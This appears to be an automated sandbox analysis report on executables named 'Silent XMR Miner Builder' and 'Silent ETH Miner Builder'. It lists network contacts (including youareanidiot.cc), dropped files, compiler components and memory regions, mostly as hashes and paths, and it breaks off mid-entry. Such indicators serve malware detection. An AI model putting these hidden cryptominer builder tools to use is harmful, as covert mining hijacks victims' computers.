US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
US 8.8.8.8:53 consentreceiverfd-prod.azurefd.net udp
US 8.8.8.8:53 consentreceiverfd-prod.azurefd.net udp
US 13.107.246.65:443 consentreceiverfd-prod.azurefd.net tcp
GB 216.58.204.67:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 ntp.msn.com udp
US 8.8.8.8:53 ntp.msn.com udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 sb.scorecardresearch.com udp
US 8.8.8.8:53 sb.scorecardresearch.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 assets.msn.com udp
US 8.8.8.8:53 assets.msn.com udp
US 8.8.8.8:53 c.msn.com udp
US 8.8.8.8:53 c.msn.com udp
GB 2.18.190.99:443 assets.msn.com tcp
GB 2.18.190.99:443 assets.msn.com tcp
US 8.8.8.8:53 c.bing.com udp
US 8.8.8.8:53 c.bing.com udp
GB 2.18.66.89:443 www.bing.com tcp
GB 2.18.190.99:443 assets.msn.com tcp
IE 13.74.129.1:443 c.msn.com tcp
US 150.171.27.10:443 c.bing.com tcp
GB 104.86.110.107:443 th.bing.com tcp
GB 18.154.84.63:443 sb.scorecardresearch.com tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net tcp
GB 2.18.190.99:443 assets.msn.com udp
US 8.8.8.8:53 browser.events.data.msn.com udp
US 8.8.8.8:53 browser.events.data.msn.com udp
US 20.42.73.25:443 browser.events.data.msn.com tcp
GB 2.18.190.99:443 assets.msn.com udp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 srtb.msn.com udp
US 8.8.8.8:53 srtb.msn.com udp
GB 2.18.66.89:443 www.bing.com udp
GB 104.86.110.107:443 th.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 r.msftstatic.com udp
US 8.8.8.8:53 r.msftstatic.com udp
US 204.79.197.219:443 r.msftstatic.com tcp
GB 2.18.66.48:443 r.bing.com tcp
GB 2.18.66.48:443 r.bing.com tcp
US 204.79.197.219:443 r.msftstatic.com tcp
US 8.8.8.8:53 ecn.dev.virtualearth.net udp
US 8.8.8.8:53 ecn.dev.virtualearth.net udp
GB 184.26.188.162:443 ecn.dev.virtualearth.net tcp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 2.18.66.171:443 th.bing.com tcp
GB 2.18.66.171:443 th.bing.com tcp
GB 104.86.110.90:443 th.bing.com tcp
GB 104.86.110.90:443 th.bing.com tcp
GB 2.18.66.171:443 th.bing.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
IE 20.190.159.23:443 login.microsoftonline.com tcp
US 8.8.8.8:53 youareanidiot.cc udp
US 8.8.8.8:53 youareanidiot.cc udp
US 104.21.95.69:443 youareanidiot.cc udp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 104.16.79.73:443 static.cloudflareinsights.com tcp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 13.107.246.64:443 static.edge.microsoftapp.net tcp
US 204.79.197.239:443 edge.microsoft.com tcp
IT 91.81.130.133:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 52.152.143.207:443 o.clarity.ms tcp
US 104.16.79.73:443 static.cloudflareinsights.com tcp
US 104.16.79.73:443 static.cloudflareinsights.com tcp
US 8.8.8.8:53 o.clarity.ms udp
US 8.8.8.8:53 o.clarity.ms udp
US 52.152.143.207:443 o.clarity.ms tcp
US 8.8.8.8:53 c.msn.com udp
US 8.8.8.8:53 c.msn.com udp
IE 13.74.129.1:443 c.msn.com tcp
GB 2.18.66.75:443 www.bing.com udp
GB 2.18.66.168:443 www.bing.com udp
GB 2.18.66.168:443 www.bing.com tcp
US 52.152.143.207:443 o.clarity.ms tcp
GB 216.58.204.67:443 beacons.gcp.gvt2.com udp
US 104.21.95.69:443 youareanidiot.cc udp
US 8.8.8.8:53 a.nel.cloudflare.com udp
US 8.8.8.8:53 a.nel.cloudflare.com udp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 52.152.143.207:443 o.clarity.ms tcp
US 52.152.143.207:443 o.clarity.ms tcp
US 8.8.8.8:53 ntp.msn.com udp
US 8.8.8.8:53 ntp.msn.com udp
US 8.8.8.8:53 browser.events.data.msn.com udp
US 8.8.8.8:53 browser.events.data.msn.com udp
US 13.89.179.9:443 browser.events.data.msn.com tcp
US 104.16.79.73:443 static.cloudflareinsights.com tcp
US 8.8.8.8:53 assets.msn.com udp
US 8.8.8.8:53 assets.msn.com udp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 r.bing.com udp
GB 2.18.66.74:443 r.bing.com udp
GB 2.18.66.74:443 r.bing.com tcp
US 8.8.8.8:53 c.bing.com udp
US 8.8.8.8:53 c.bing.com udp
US 8.8.8.8:53 c.bing.com udp
US 8.8.8.8:53 c.bing.com udp
IE 13.74.129.1:443 c.msn.com tcp
GB 2.18.66.74:443 r.bing.com udp
US 150.171.28.10:443 c.bing.com tcp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 2.18.66.171:443 th.bing.com udp
GB 2.18.66.171:443 th.bing.com tcp
US 52.152.143.207:443 o.clarity.ms tcp
US 52.152.143.207:443 o.clarity.ms tcp
GB 2.18.190.171:443 assets.msn.com udp
GB 2.18.190.171:443 assets.msn.com udp
IE 13.74.129.1:443 c.msn.com tcp
US 150.171.28.10:443 c.bing.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 13.107.21.239:443 edge.microsoft.com tcp
US 150.171.27.10:443 www2.bing.com tcp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
NL 20.190.160.67:443 login.microsoftonline.com tcp
US 8.8.8.8:53 sb.scorecardresearch.com udp
US 8.8.8.8:53 sb.scorecardresearch.com udp
GB 18.165.242.4:443 sb.scorecardresearch.com tcp
US 8.8.8.8:53 assets.msn.com udp
US 8.8.8.8:53 assets.msn.com udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
GB 2.18.190.182:443 assets.msn.com tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 www.msn.com udp
US 8.8.8.8:53 www.msn.com udp
US 8.8.8.8:53 o.clarity.ms udp
US 8.8.8.8:53 o.clarity.ms udp
GB 2.18.190.182:443 assets.msn.com udp
US 8.8.8.8:53 c.msn.com udp
US 8.8.8.8:53 c.msn.com udp
IE 13.74.129.1:443 c.msn.com tcp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 2.18.190.182:443 assets.msn.com udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
GB 2.18.66.51:443 th.bing.com udp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 browser.events.data.msn.com udp
US 8.8.8.8:53 browser.events.data.msn.com udp
US 104.208.16.95:443 browser.events.data.msn.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
GB 2.18.66.171:443 th.bing.com udp
US 8.8.8.8:53 srtb.msn.com udp
US 8.8.8.8:53 srtb.msn.com udp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net udp
GB 2.18.66.73:443 www.bing.com udp
US 8.8.8.8:53 ntp.msn.com udp
US 8.8.8.8:53 ntp.msn.com udp
US 8.8.8.8:53 assets.msn.com udp
US 8.8.8.8:53 assets.msn.com udp
GB 2.20.12.83:443 assets.msn.com udp
US 8.8.8.8:53 srtb.msn.com udp
US 8.8.8.8:53 srtb.msn.com udp
US 8.8.8.8:53 o.clarity.ms udp
US 8.8.8.8:53 o.clarity.ms udp
US 52.152.143.207:443 o.clarity.ms tcp
US 8.8.8.8:53 assets.msn.com udp
US 8.8.8.8:53 assets.msn.com udp
GB 2.20.12.76:443 assets.msn.com udp

Files

C:\Users\Admin\AppData\Local\Temp\7zO45491668\Silent XMR Miner Builder.exe

MD5 5d7c1b7e0dfc268c1d7fd78ee0d74c71
SHA1 71f9d9872c4aec12556a885542ffdcae3f11f693
SHA256 afb19f7e92067a16800054daf6599d1a9cfcb647e322760e6c542b1cdf8ece67
SHA512 d899defc62d7378b647a6b84e2e14d872deec142947c07531954544543882b5ba41b80d08c026a49cadc1e17d9267ddaf44ab0d9ce5fdeb9c10846e4c99d3821

memory/1040-12-0x00007FFF591D3000-0x00007FFF591D5000-memory.dmp

memory/1040-13-0x0000020763490000-0x0000020765AD6000-memory.dmp

memory/1040-14-0x00007FFF591D0000-0x00007FFF59C92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe

MD5 05c9264489ab55971abfc303d990fae0
SHA1 11905331da50c52d9fd3ba33d6d090e5858b351f
SHA256 37a7697a061a29de38304a117b7540b438c2ce004d793b104aec173802d42829
SHA512 a46b3c1e4c5780e847b0e4694a10daca3c2db32a11e9811fbfdee183940d38bb718372b864d1e79f08a6a9ce67b42487fb7c65bf038fc1d4f7ce4c49b6b22754

memory/4304-27-0x000001CA83050000-0x000001CA83B2E000-memory.dmp

memory/1040-28-0x00007FFF591D3000-0x00007FFF591D5000-memory.dmp

memory/1040-29-0x00007FFF591D0000-0x00007FFF59C92000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

MD5 be4306ed23e3366c80b84db4f2f21e3b
SHA1 e8ffe0e84930f28f44e86410450c7c303da78431
SHA256 0bd4f69043a6efec682af5d1145a22127ae2d97bd66cce63e35132f85fff2778
SHA512 a18bcad9ff46d69f79a6f49af210797b582bbb97b523b56b7b6a57cc37b34c5403bbfe259ec218a11853f557801ef61a260fb4dfad95f6453ef1a798c65b1fa6

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

MD5 81c85d449a065cc8652f0db59e60966f
SHA1 210c027432679316ddb977e5b31ccf905593b0dc
SHA256 f7ec4768a6fbd2bf529dc3f1ffbadf0853fe26f43f8490b1f048a43fa1d6faf6
SHA512 6accf832944c7ba738bb6b0cd2bce4ad32292229b481827dc7e1ec5f166b9174b8983a5b039af3c790e75fac98290bbbfe049d12c846b5f65857d4456145b42d

\??\c:\Users\Admin\AppData\Local\Temp\zqlo2ilv\zqlo2ilv.cmdline

MD5 8b0c1f8e8ac1b00c385508c47e7a699b
SHA1 3c53da9dbf210bb2c6abe1a333059775c768ffdf
SHA256 804b848dbb53dad23b60c5fa8f51ae5b782b2293b1a289ec5bdca2480f910c97
SHA512 1db09b60b8da1dcec872a5ce5e01b715887ab93b1a4f8e78db7b2edd3cad13c921a19e15c7157d14a27108c4eef6ab89a5cd0dc0cf2e7654fd8bf2e41f51cd53

\??\c:\Users\Admin\AppData\Local\Temp\zqlo2ilv\zqlo2ilv.0.cs

MD5 2a9128fc6ca0c5821b88e9d951547e80
SHA1 071d1c0d802e9d39bee8a5d46ae8968d9e41cfde
SHA256 421a4e4e7ee1047ef710e26d3ea6ec20da9336d8bede9efff16dd3c8bc7c738b
SHA512 ad98b36d10faafa6d373d7a283e963f822dd5ac2db5647b65d670ba5414026fffba7011ac821c84a5b43035339d0fd5fc87e67b8381daed8b1cd0a3d463f46a9

\??\c:\Users\Admin\AppData\Local\Temp\7zO454C4998\ddd-watchdog.exe.manifest

MD5 1ac9814242d34e9f458c59e745df6615
SHA1 1050554afc518cd7a90f28234586fbeb7b003de2
SHA256 df38910bf7c2e3f267c7fbcf0b0a94870ce1c0ce0e20a5c95f99411d2bfd68cc
SHA512 6b80c952e23d2096a8927fea04f024a149cbc9494c6a4e3310c2d8feb7d2e6555156f4d4d0da2866bed728f704705df71d428480b93ae1493a13e1bb6659f720

\??\c:\Users\Admin\AppData\Local\Temp\7zO454C4998\CSCF08CCC66BD4841DBA5321FC7798AD82C.TMP

MD5 3a86c8caa493132da75941a83ac4ccf3
SHA1 141b422e3ddff1fc2534b1d45e58f3abbb0573b0
SHA256 5022aa7ecc430a382b811cdacbbff3ad0e7f7d7cd3705aca5464a0cdaad58011
SHA512 17360a7839c48f53df4bed8f7c1e5072283a635a354b17fe47492e6700bec8a53f6d1d7506769e6540e998b35688cc9615dea31c295f8c86da8378960f42e20c

C:\Users\Admin\AppData\Local\Temp\RES127.tmp

MD5 81d413174d3b7d565e07637c451278c9
SHA1 5024ee8973a13658ebadb1d5f9e0e048e0c0b01a
SHA256 29173e8227fc85bddf8b0c85981078eefc4581f02a1d5288c52f8d44ea5385d7
SHA512 b7786d7a4847c3da778af7de952a6fc50a74a5311f8bcd72d7d7b722538986ff4fa32807ed1fbfc3cb471e4277ce8740e6224eb09529f0e5cb5e70b0cf34e6a8

memory/4304-64-0x000001CA9ED70000-0x000001CA9ED7A000-memory.dmp

memory/4304-63-0x000001CA9EC60000-0x000001CA9EC72000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe

MD5 656ea3e44dd98bdddfa28689f433222e
SHA1 866428a060d29bdacbe3d46e6234f815ba276bf4
SHA256 4757d9fc9e1342cfe0387ec0477fcf1996876a266a7eae7a820144c89e4a3a8b
SHA512 fb2e478829fa6e5b99959cf6cebb937e1228a16fc13515e2267833d25096e47c8659daf154273bb84a9c717560f0a9be66de1b3bb4e41659e3c378f60df3e95d

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe

MD5 43acaac9b437bd941c793ca6d9e776f7
SHA1 c7de884538ea84e50127331fde9642c4b99fa966
SHA256 27d8ea1223c1cf411773a39e8ef406d1f1d5d8956a0351ba8c74cc6c87978258
SHA512 6587acc6c03afdfb7ac5e48f01978832dac491f9cdd86d1bc68f997e85000056cbfe6c27462ec3713c4bfad139f7a4937a0258eed98cede48dddacc2f17cac2d

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\libiconv-2.dll

MD5 661d92527d19257cba74a711bd3a5666
SHA1 5c02b30aa0facdce317b981eba7a46827942e783
SHA256 5e3e889409110f7b7c2400f522b31d77b64fb3ab76ccfb9733acde34a07b7ad3
SHA512 b9a5a59a82abae523db746f48465bdadd655f6553c9dfef92a3b14fd2d561e67c90605ce01210c7476c77ed688e8ef398e25ed5f319492a79cf8284dae8398a8

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe

MD5 72d8fe1f322d4eadbe4b825d0fbba8e3
SHA1 14111de0cf33c5608e2d800e96f0bdb8132b7105
SHA256 6ce68e248fb64e366aaa6a5fe34fbf530299337de34f03d51dac6b59c86b9a0d
SHA512 5f0e73be9ad6f5661b8a9a276966122c96453f73cf6f2dbbf10ac31eee8888c20217ac0b608f69e8302029352e620036804ee8733a5e5e62a104adad9245ffcb

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\libcloog-isl-3.dll

MD5 301bccd39510e47ba9bcb199c15319f7
SHA1 a1c0ade259f3c504e0a3d2a06b1f23218f15f0f7
SHA256 ff6cadf145cd39b19af0b4183eb7c98bbe2e9195d03ded4117be153052ad46bc
SHA512 2d692d7581ad3dc95c6222b02628dd805748ccaf5276674d5f4633d3cfc64847a6d81b87f9c82a1f866e4a0a3b48493671db4e3caf6d400304eb547c6ead3997

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\libmpfr-1.dll

MD5 5610d32d53b668c95c69b530c2250dd7

MD5 a732001b6f140d1f8a2590ea5b613f23
SHA1 318365fa0285ba8026bd21537f4c2d511bfd5134
SHA256 84191aab45e31fb17475b13e94d058501a07786abaf3753582d98e0c8ac03baf
SHA512 2fc1aba7477608f1443706b48325d5080f1b96e2aeb32351a3c44e479af61006d6c39994a5e93ad1f25f0a93adea42505547e3fc4fcdfc385d04865782c44d12

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\index.txt~RFe63fa25.TMP

MD5 7b03a5feab7d2008fdd4613651ad9d8f
SHA1 881846ba0d5e794fbf96b2c3dde51ee74ffc2633
SHA256 b7c2b87fcd91904ee23235578994671e87c70f9df3a68f75386cd9b66e15fb53
SHA512 4d026c2bd78cbbf99e52fc7766186e1d0338172e70375de49d6d95938ca7e57751d15787b7935293cbbb335ec7030ebf7a92fe7aa68cfa568c895ded56afd660

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 051b58b0651ba363f02f1fefba3128ec
SHA1 567b3ee0b60388367ffc0759652973d45038d11f
SHA256 49f98f8d65abc8ae966a23ad631b00b9e31fc68c59e67116060314a803d3c316
SHA512 392f3400ea0f2b3b943282d3991f4b03cc336e29f97f435068aa9ac11254a9165cebf35174fc38a8346499c3cf5c6c0d5e81c08dcc20d96caa335eed90a40a23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 f203d55c501809975ba507f972d138df
SHA1 bb1f235d2af9286a3bcc9e125d0b50204e2c7797
SHA256 758d11748eea7cac3c2057bee7bd09839282c25a30c248ec676380abbbfb3ada
SHA512 0afc510743013ee04bd232f5e50968d748e07e23754a5cd17b7e4893d9ff3a873fb0321674824d5ba27cff7902cd50f34fdfc54c040b0190b3027677b9436fd4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 e687c4ad5b45918290dc016791fcb891
SHA1 112f6ee0c7fc148f664e5cbdedbf545e9b1a5791
SHA256 10a51372594ab1ae0803ea399a2516b2438d4e28a904d5ef5292b9caa6cc34b4
SHA512 c0936bec69483ed3a3e8031bcd9e6b3ad2dc54c96b7ead1e97fc8c32502b5fcc92d91c6172e951913f8e7c678014a19725dfc21b6b03048bede4cc813b552028

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 611d9f4b2d41c3a63ea09dec0529075e
SHA1 b79084f2c80d121a0c76fe3abf18f703c0222176
SHA256 73bb336c148c8e5e91f6669b1fbaf005e5633a28ff250ad4a0368dffc4c3fe85
SHA512 e0cad26ddc79779382bd848c5a8dfdea0bc1ffa1e96fc9baabb60409f03e44c2e682aa16597f4a8ad9b789999f2a2bad1f9948f63d6c86063d6da595560991a3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_apps.microsoft.com_0.indexeddb.leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\index.txt

MD5 fa0a5d534c651698ee3c63d376f42ce4
SHA1 28f4b1cfc2439dd91ad097b5e9fe78f3e9b17581
SHA256 8f1ae6cd778174504de8d3c2fed15cdee2bad9342431db6ddb5e18bc8879ad29
SHA512 b1d070422d6e43fb5cb8ddaef257c52ed995d2bf18c55b193c6963b2cd3a3a9f4c0c7ccabc69612fd99136680ef744f6c7fcc6bfbec1a4bfadb940f4d050b02e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\809a9023-5c06-4b20-8fb9-c9c2e3d7083a\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 bcaef69b1e9be33fc0d391643cc86438
SHA1 e293e2b01c81455f876b3d48c2bb7bad3f07fc37
SHA256 76c296a4926797861d12c4cf05f53e020e86f1c5801385dfeeef98bc5badb5cd
SHA512 ad10827519fdec867dc8922ed9afde0b4a96540803c0abe79c1f8360422866fd9a1c70c9e1b3fdd875cd09b65bacbb0961f860a419086374ff0c51fd10e663be

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6a0c5f01d22a2f62630a79471cd70f4b
SHA1 3e946a5e1276fa168cd657e1e2c257fe4de168ba
SHA256 8b8aad5c8b1df392f1df92d8253121ae9c4b1b5b1401af2cf8469c8c23c84220
SHA512 203939c00cefe4e40b9e2c794df52ecfd8c8bd27beaa1cd7081c6f9f0db5d1d7f8a37db135ac29c79a0b44bba3ddfe3d8e8f3cbab505d0577d39dc9fe5acf896

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 b35c785e962321a545b0e51477ee844e
SHA1 e9ee7843bf975d99924fd9fd280c0eeda945ffa0
SHA256 6ca2f312b9c9a8a61c1719edf8e6d55bb1720787185889d19f750e319fac1386
SHA512 3df74ae79b59035c34d267e383c8f493ec3e0c0c4b02dbd98966391855c2c09aca4bff4eab7f3a2e3d014586d637af84716cd212d019da07f7a7703eb40c1c84

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\86335df1-2707-4642-b4bb-b4cd37e7bb40\b07a483d6652cafd_0

MD5 2f893d572bfe29c8da579485c0837181
SHA1 625a1524de23039544492cb5079ed3bf6a66051e
SHA256 9f1897f26dba815e92eba698575237ad05bb78a7c26e564ea237888ad6a7e04b
SHA512 f8270f58aa2393ce8d49fd6ddf8cef3bff07017a003d59ceff0995c6256b504a42befb5d2711b868163bf9c80fc5ec60d29fff87f5a7afce0bf96d3bf513f032

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00006b

MD5 9b539bb03720cea32dcd38400410f84c
SHA1 d5fc52b9873ede9f90a30090cd5e2b5b24274ece
SHA256 66d8210272aacdd21c75cc9c1658ddf5c26cb36812e4ef32fbb612be904276c2
SHA512 0acfbd78eb9f33a98b7bf331c59986f7fd9077c976b2069c73d3453e222c568f26ff750ead161efe66f01baa3441a4d2fd7a65922f6b4a218d93778075561d14

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\86335df1-2707-4642-b4bb-b4cd37e7bb40\03ee873af60c39e1_0

MD5 b352eb14a530e855ced695fb78ded0a2
SHA1 e557ab5ea88c4133b1a09a659f9809ab4ee45c57
SHA256 59edff1671e4cb49baaaf13be6c83ecde5b7a53ea4572003cc4f458a83acf69c
SHA512 4e5c6273b32086b6860c3da99657ac67326ba7c2285ff6a995389030ed26ea003761c68b36a521e16a4be2d03b2d887808c75a8f5084257375acb4f8b2c2caf7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\86335df1-2707-4642-b4bb-b4cd37e7bb40\2636681ffd1d4506_0

MD5 42afa7ebb08a7bf988f502748ad39e37
SHA1 b2d245eabf90585b02da52407658d2d796d8d011
SHA256 403622337ab41e57f7e98d659b925679b6c37de05fa56fc3c95c3698bc423a56
SHA512 29f5e4f302c33ccba324db25228778063a97bc17e9381f824b982ea64db93010629a01ca9611888b002ea43eab7a81b89643bed820228bbbbdcf528017ab395f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\index.txt

MD5 552e0e8404be5356f713a2fa383dcf8d
SHA1 52688429159bf7c7c1fda097d79838ddf04a4c4e
SHA256 84b92d3e9776bc0ae49601b4310bbeecc5480f18ecda416d2ebd851e74aa1304
SHA512 fa3f4a570a378fbe323556367a442f4459005a8eb54237b284eadf9bd3832acb8a5f931fb6e3be64f807884c00a1312fc03f4afd4f8c1cfe575ea48a841cc1bb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_apps.microsoft.com_0.indexeddb.leveldb\LOG

MD5 8e177bd66e55174c66505946f81c3d69
SHA1 08911cdb3508796712e56be0a335b32f81b57cee
SHA256 e00379ec30ccfa0e0db8c8f462f19e0d3d02dc15bd2e4cd47bb96099d8263653
SHA512 ca84ee6bb07234ab1e87bd481d17602ba06c88e710a60f8570131329b4cddf51388efbd6dae5f4f0f233db84cb68548354816ebdb9609b3b371abfe014b98c5b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_apps.microsoft.com_0.indexeddb.leveldb\000003.log

MD5 aba994bee829211e8e257d5a0f32f679
SHA1 ac3ab8c44772183445ddbaf7f4577d8a8773c9c2
SHA256 8543f2fb435bc05e8a1d592215b9edb3147e5b2e68229de52776d7279337f0d8
SHA512 2dda0cee6ff9287dee6194f7ab2ad357d2dafbae7aa94ac5caf6248e597b52afae7466b77c1074be6a065aed4cb5a921bd1cd3025ded6dad9ac01266a822810f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\86335df1-2707-4642-b4bb-b4cd37e7bb40\9164997e0e4a026d_0

MD5 fd628f4153e88f08968816ab98942064
SHA1 2d975346a9509f5b0449f11d5dad8a15ba76b46b
SHA256 7ea5d2de4606045054f7dfe9dd23034767a958a243c8d985b224ff8238c7a50d
SHA512 8dd529840d1a0fecec7c5aaf23cef7e504412b5c4a724ea6fdbbad0c5f9424f9f29f6b6210050c2adbfb114e389582c2f5edb664bc95375799f6d2538bfb95a4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\86335df1-2707-4642-b4bb-b4cd37e7bb40\0b0a3ce1a915cb26_0

MD5 d74cd4afebc3cee020f210a04c5c05c4
SHA1 5a5c62b1f07b784b01301451a07b2e13b1b307fa
SHA256 287c2040ed7e4fb1e17cd90a8897102b1e96a489dd94b8d89e996fe5b08c4750
SHA512 62d0c6107f9907a6ec822dfc1855f36f1ea4a1a8d2fa8c3fd8b0df1f6b7065879a020b96c0f2532747ddff4eeaab542fef1da3257873e1f2104ef6061c720781

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\86335df1-2707-4642-b4bb-b4cd37e7bb40\a590447832c6a057_0

MD5 d5dce927ef3299e20eded4306d379d22
SHA1 e51b5cc41f351b8c46431d5b55e2280b2c2cd299
SHA256 814c888fd966641a31f72aabd79dc120ad8afc09a7954de91592b4290059ef99
SHA512 3f562c301958c0c22a86e3722162699c2d68f7a2b1214be457ffb339f1241c302f87eeb3817a945ea9bb5ae66a5b1ea193139a07bd6535f72fcabeebc5ce5712

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\index.txt

MD5 5681c18f7adc59144d8b92d628a2a9c3
SHA1 3b956cbeaf860a00e7c3c7851847898680fe206c
SHA256 fbb4d938331f38ba2819b763b47dcf3d62a5bf578d52c528243d77e305a98753
SHA512 346dd036271026631d768bdde28ef95e5a4c9330ebc5782e6a4aa1c6703c7d40af8752958b8ee226ab54b1f8569bf4fb37b45a23d6215229ce9836016c3fc012

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_apps.microsoft.com_0.indexeddb.leveldb\MANIFEST-000001

MD5 3fd11ff447c1ee23538dc4d9724427a3
SHA1 1335e6f71cc4e3cf7025233523b4760f8893e9c9
